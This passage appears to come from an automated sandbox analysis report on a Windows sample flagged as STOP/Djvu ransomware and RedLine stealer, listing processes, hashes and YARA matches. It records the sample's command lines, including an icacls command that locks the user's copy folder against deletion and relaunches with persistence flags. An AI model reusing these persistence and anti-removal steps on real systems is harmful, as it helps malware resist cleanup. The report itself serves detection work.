                                                                                  Imagebase:0x400000
                                                                                  File size:747520 bytes
                                                                                  MD5 hash:5FAE11A9DDB49452B6896FD3217E9665
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.378159844.00000000041D0000.00000040.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                  • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000000.00000002.378332147.0000000004270000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000000.00000002.378332147.0000000004270000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                  Reputation:low

                                                                                  Target ID:2
                                                                                  Start time:11:22:19
                                                                                  Start date:05/08/2022
                                                                                  Path:C:\Users\user\Desktop\bE5aaTiJM0.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\Desktop\bE5aaTiJM0.exe"
                                                                                  Imagebase:0x400000
                                                                                  File size:747520 bytes
                                                                                  MD5 hash:5FAE11A9DDB49452B6896FD3217E9665
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                                                                  • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                  • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                  • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000002.00000000.372461553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                  • Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000002.00000000.373064950.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                                                                  • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000002.00000000.373064950.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000002.00000000.373064950.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                  • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000002.00000000.373064950.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                  • Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000002.00000000.376120577.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                                                                  • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000002.00000000.376120577.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000002.00000000.376120577.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                  • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000002.00000000.376120577.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                  • Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000002.00000000.374159139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                                                                  • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000002.00000000.374159139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000002.00000000.374159139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                  • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000002.00000000.374159139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                  • Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000002.00000000.375528936.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                                                                  • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000002.00000000.375528936.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000002.00000000.375528936.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                  • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000002.00000000.375528936.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                  • Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000002.00000000.374930864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                                                                  • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000002.00000000.374930864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000002.00000000.374930864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                  • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000002.00000000.374930864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                  Reputation:low

                                                                                  Target ID:5
                                                                                  Start time:11:22:26
                                                                                  Start date:05/08/2022
                                                                                  Path:C:\Windows\SysWOW64\icacls.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:icacls "C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe" /deny *S-1-1-0:(OI)(CI)(DE,DC)
                                                                                  Imagebase:0xa30000
                                                                                  File size:29696 bytes
                                                                                  MD5 hash:FF0D1D4317A44C951240FAE75075D501
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high

                                                                                  Target ID:7
                                                                                  Start time:11:22:27
                                                                                  Start date:05/08/2022
                                                                                  Path:C:\Users\user\Desktop\bE5aaTiJM0.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\Desktop\bE5aaTiJM0.exe" --Admin IsNotAutoStart IsNotTask
                                                                                  Imagebase:0x7ff6406f0000
                                                                                  File size:747520 bytes
                                                                                  MD5 hash:5FAE11A9DDB49452B6896FD3217E9665
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000007.00000002.409352563.00000000027E4000.00000040.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                  • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000007.00000002.409983046.0000000004290000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000007.00000002.409983046.0000000004290000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                  Reputation:low

                                                                                  Target ID:8
                                                                                  Start time:11:22:27
                                                                                  Start date:05/08/2022
                                                                                  Path:C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe --Task
                                                                                  Imagebase:0x400000
                                                                                  File size:747520 bytes
                                                                                  MD5 hash:5FAE11A9DDB49452B6896FD3217E9665
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000008.00000002.448603101.0000000004350000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000008.00000002.448603101.0000000004350000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                  • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000008.00000002.448142800.00000000041B2000.00000040.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                  Antivirus matches:
                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                  • Detection: 54%, ReversingLabs
                                                                                  Reputation:low

                                                                                  Target ID:9
                                                                                  Start time:11:22:34
                                                                                  Start date:05/08/2022
                                                                                  Path:C:\Users\user\Desktop\bE5aaTiJM0.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\Desktop\bE5aaTiJM0.exe" --Admin IsNotAutoStart IsNotTask
                                                                                  Imagebase:0x400000
                                                                                  File size:747520 bytes
                                                                                  MD5 hash:5FAE11A9DDB49452B6896FD3217E9665
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000009.00000000.402254205.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                  • Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000009.00000000.406644457.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                                                                  • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000009.00000000.406644457.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000009.00000000.406644457.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                  • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000009.00000000.406644457.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                  • Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000009.00000000.402920593.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                                                                  • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000009.00000000.402920593.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000009.00000000.402920593.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                  • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000009.00000000.402920593.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                  • Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000009.00000002.412239693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                                                                  • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000009.00000002.412239693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000009.00000002.412239693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                  • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000009.00000002.412239693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                  • Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000009.00000000.403911103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                                                                  • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000009.00000000.403911103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000009.00000000.403911103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                  • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000009.00000000.403911103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                  • Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000009.00000000.407464863.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                                                                  • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000009.00000000.407464863.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000009.00000000.407464863.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                  • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000009.00000000.407464863.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                  • Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000009.00000000.405310385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                                                                  • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000009.00000000.405310385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000009.00000000.405310385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                  • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000009.00000000.405310385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                  Reputation:low

                                                                                  Target ID:10
                                                                                  Start time:11:22:36
                                                                                  Start date:05/08/2022
                                                                                  Path:C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe" --AutoStart
                                                                                  Imagebase:0x400000
                                                                                  File size:747520 bytes
                                                                                  MD5 hash:5FAE11A9DDB49452B6896FD3217E9665
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000000A.00000002.429478962.00000000041D1000.00000040.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                  • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000000A.00000002.431402243.0000000004270000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000000A.00000002.431402243.0000000004270000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                  Reputation:low

                                                                                  Target ID:11
                                                                                  Start time:11:22:40
                                                                                  Start date:05/08/2022
                                                                                  Path:C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe" --AutoStart
                                                                                  Imagebase:0x400000
                                                                                  File size:747520 bytes
                                                                                  MD5 hash:5FAE11A9DDB49452B6896FD3217E9665
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 0000000B.00000000.419924112.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                                                                  • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000000B.00000000.419924112.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 0000000B.00000000.419924112.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                  • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000000B.00000000.419924112.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                  • Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 0000000B.00000000.419105516.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                                                                  • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000000B.00000000.419105516.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 0000000B.00000000.419105516.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                  • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000000B.00000000.419105516.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                  • Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 0000000B.00000000.424465720.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                                                                  • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000000B.00000000.424465720.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 0000000B.00000000.424465720.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                  • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000000B.00000000.424465720.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                  • Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 0000000B.00000002.435929161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                                                                  • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000000B.00000002.435929161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 0000000B.00000002.435929161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                  • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000000B.00000002.435929161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                  • Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 0000000B.00000000.421469310.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                                                                  • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000000B.00000000.421469310.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 0000000B.00000000.421469310.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                  • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000000B.00000000.421469310.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                  • Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 0000000B.00000000.422893341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                                                                  • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000000B.00000000.422893341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 0000000B.00000000.422893341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                  • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000000B.00000000.422893341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                  • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000000B.00000000.418527999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                  Reputation:low

                                                                                  Target ID:12
                                                                                  Start time:11:22:43
                                                                                  Start date:05/08/2022
                                                                                  Path:C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe --Task
                                                                                  Imagebase:0x400000
                                                                                  File size:747520 bytes
                                                                                  MD5 hash:5FAE11A9DDB49452B6896FD3217E9665
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 0000000C.00000000.443455238.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                                                                  • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000000C.00000000.443455238.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 0000000C.00000000.443455238.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                  • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000000C.00000000.443455238.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                  • Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 0000000C.00000000.440796154.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                                                                  • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000000C.00000000.440796154.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 0000000C.00000000.440796154.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                  • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000000C.00000000.440796154.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                  • Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 0000000C.00000000.441862325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                                                                  • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000000C.00000000.441862325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 0000000C.00000000.441862325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                  • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000000C.00000000.441862325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                  • Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 0000000C.00000002.618738574.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                                                                  • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000000C.00000002.618738574.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 0000000C.00000002.618738574.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                  • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000000C.00000002.618738574.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                  • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000000C.00000000.439811041.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                  • Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 0000000C.00000000.442423722.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                                                                  • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000000C.00000000.442423722.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 0000000C.00000000.442423722.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                  • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000000C.00000000.442423722.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                  • Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 0000000C.00000000.441346091.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                                                                  • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000000C.00000000.441346091.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 0000000C.00000000.441346091.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                  • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000000C.00000000.441346091.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                  Reputation:low

                                                                                  Target ID:14
                                                                                  Start time:11:22:44
                                                                                  Start date:05/08/2022
                                                                                  Path:C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe" --AutoStart
                                                                                  Imagebase:0x400000
                                                                                  File size:747520 bytes
                                                                                  MD5 hash:5FAE11A9DDB49452B6896FD3217E9665
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000000E.00000002.445958712.00000000041A4000.00000040.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                  • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000000E.00000002.446247010.0000000004240000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000000E.00000002.446247010.0000000004240000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                  Reputation:low

                                                                                  Target ID:16
                                                                                  Start time:11:22:49
                                                                                  Start date:05/08/2022
                                                                                  Path:C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe" --AutoStart
                                                                                  Imagebase:0x400000
                                                                                  File size:747520 bytes
                                                                                  MD5 hash:5FAE11A9DDB49452B6896FD3217E9665
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000010.00000000.440338861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                  • Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000010.00000000.442195421.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                                                                  • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000010.00000000.442195421.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000010.00000000.442195421.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                  • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000010.00000000.442195421.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
